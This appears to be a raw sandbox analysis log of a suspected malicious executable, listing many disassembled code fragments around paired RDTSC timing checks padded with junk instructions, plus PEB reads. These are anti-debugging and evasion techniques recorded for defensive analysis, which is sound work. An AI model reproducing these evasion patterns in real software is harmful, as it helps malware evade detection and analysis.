Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088590 second address: 108859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6D94B296F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088840 second address: 1088883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6D94F51089h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6D94F51087h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088883 second address: 10888A7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6D94B296F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94B296FAh 0x00000011 jmp 00007F6D94B296FEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088A32 second address: 1088A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088A38 second address: 1088A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6D94B296FDh 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007F6D94B29701h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088C18 second address: 1088C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F6D94F51095h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088F0A second address: 1088F2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6D94B296FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F6D94B296FBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 108920F second address: 1089215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1089215 second address: 108923E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29704h 0x00000007 jmp 00007F6D94B296FDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 108923E second address: 1089242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10905E2 second address: 10905EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10905EA second address: 10905EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A5E second address: 1090A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A62 second address: 1090A6C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6D94F51076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A6C second address: 1090A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A72 second address: 1090A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6D94F51076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A7D second address: 1090A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A83 second address: 1090A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090A8B second address: 1090A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090C34 second address: 1090C52 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6D94F51076h 0x00000008 jnp 00007F6D94F51076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D94F5107Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1090DB7 second address: 1090DC1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6D94B29702h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 109141E second address: 1091436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6D94F5107Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1092383 second address: 109239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D94B296FFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 109239B second address: 109239F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10980C9 second address: 10980E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FEh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6D94B296F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10A5DBA second address: 10A5DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10A5F4B second address: 10A5F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10A9B10 second address: 10A9B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F6D94F51076h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D94F51085h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FD8B9F second address: FD8BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FD8BA7 second address: FD8BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BF089 second address: 10BF08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BF3E3 second address: 10BF3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BFAAB second address: 10BFAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BFAAF second address: 10BFABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F6D94F51076h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BFABF second address: 10BFAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10BFAC3 second address: 10BFAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94F51086h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3F68 second address: 10C3F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B296FAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6D94B296F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3A8E second address: 10C3ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51086h 0x00000007 jmp 00007F6D94F51082h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3ABD second address: 10C3AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6D94B296F6h 0x0000000a jmp 00007F6D94B296FAh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3AD2 second address: 10C3AF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F6D94F51076h 0x00000009 jo 00007F6D94F51076h 0x0000000f pop ebx 0x00000010 je 00007F6D94F5107Ah 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3AF3 second address: 10C3B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3B06 second address: 10C3B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3B0C second address: 10C3B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3B14 second address: 10C3B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3C8D second address: 10C3CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F6D94B296F6h 0x0000000e jg 00007F6D94B296F6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C3CA2 second address: 10C3CB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6D94F5107Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C7E4A second address: 10C7E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C7E4E second address: 10C7E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6D94F51076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F6D94F51082h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10C7E62 second address: 10C7E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1109D4E second address: 1109D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1106908 second address: 110691E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F6D94B296FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 110691E second address: 110693C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F6D94F51081h 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 110693C second address: 1106942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1106942 second address: 1106950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F6D94F51076h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1106950 second address: 1106957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1117372 second address: 1117389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51081h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DB472 second address: 11DB487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F6D94B296FCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DB487 second address: 11DB49C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51081h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DB49C second address: 11DB4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnl 00007F6D94B296F6h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DB4B3 second address: 11DB4E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51087h 0x00000007 jo 00007F6D94F51076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F6D94F51082h 0x00000015 jno 00007F6D94F51076h 0x0000001b jng 00007F6D94F51076h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBA59 second address: 11DBA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6D94B29704h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBA79 second address: 11DBA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBD1C second address: 11DBD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBD27 second address: 11DBD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94F51086h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBD41 second address: 11DBD5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29707h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DBECF second address: 11DBED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DC1CC second address: 11DC1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B296FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DC1DA second address: 11DC1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F6D94F5107Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DDB4F second address: 11DDB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jc 00007F6D94B29705h 0x0000000d jmp 00007F6D94B296FFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DDB6B second address: 11DDB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F5107Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11DDB7B second address: 11DDB7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E04C0 second address: 11E04ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94F5107Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E04ED second address: 11E04F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E05D2 second address: 11E05D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E3491 second address: 11E3495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E545C second address: 11E5463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E5463 second address: 11E546F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6D94B296F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E546F second address: 11E5473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 11E5473 second address: 11E5490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F6D94B29704h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0021 second address: 74F0030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0030 second address: 74F0043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0B0ED17Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0043 second address: 74F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov cx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6D94F5107Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushad 0x00000012 mov di, cx 0x00000015 pushfd 0x00000016 jmp 00007F6D94F51086h 0x0000001b adc al, 00000048h 0x0000001e jmp 00007F6D94F5107Bh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr fs:[00000030h] 0x0000002c jmp 00007F6D94F51082h 0x00000031 sub esp, 18h 0x00000034 pushad 0x00000035 jmp 00007F6D94F5107Eh 0x0000003a movzx ecx, bx 0x0000003d popad 0x0000003e push ebx 0x0000003f jmp 00007F6D94F5107Ah 0x00000044 mov dword ptr [esp], ebx 0x00000047 pushad 0x00000048 mov edx, eax 0x0000004a movzx esi, di 0x0000004d popad 0x0000004e mov ebx, dword ptr [eax+10h] 0x00000051 pushad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 mov edx, 26D85502h 0x0000005a popad 0x0000005b mov esi, edx 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push edi 0x00000063 pop ecx 0x00000064 jmp 00007F6D94F51083h 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F00F5 second address: 74F0172 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f jmp 00007F6D94B296FAh 0x00000014 mov esi, dword ptr [756006ECh] 0x0000001a jmp 00007F6D94B29700h 0x0000001f test esi, esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F6D94B296FEh 0x00000028 adc cx, 4958h 0x0000002d jmp 00007F6D94B296FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F6D94B29706h 0x0000003b add eax, 02B853B8h 0x00000041 jmp 00007F6D94B296FBh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0172 second address: 74F01F5 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F6D94F52058h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F6D94F51083h 0x00000015 xor esi, 1E96D22Eh 0x0000001b jmp 00007F6D94F51089h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 push esi 0x00000024 jmp 00007F6D94F5107Ch 0x00000029 mov dword ptr [esp], edi 0x0000002c jmp 00007F6D94F51080h 0x00000031 call dword ptr [755D0B60h] 0x00000037 mov eax, 7696E5E0h 0x0000003c ret 0x0000003d jmp 00007F6D94F51080h 0x00000042 push 00000044h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F01F5 second address: 74F0227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29704h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94B29707h 0x00000011 rdtsc
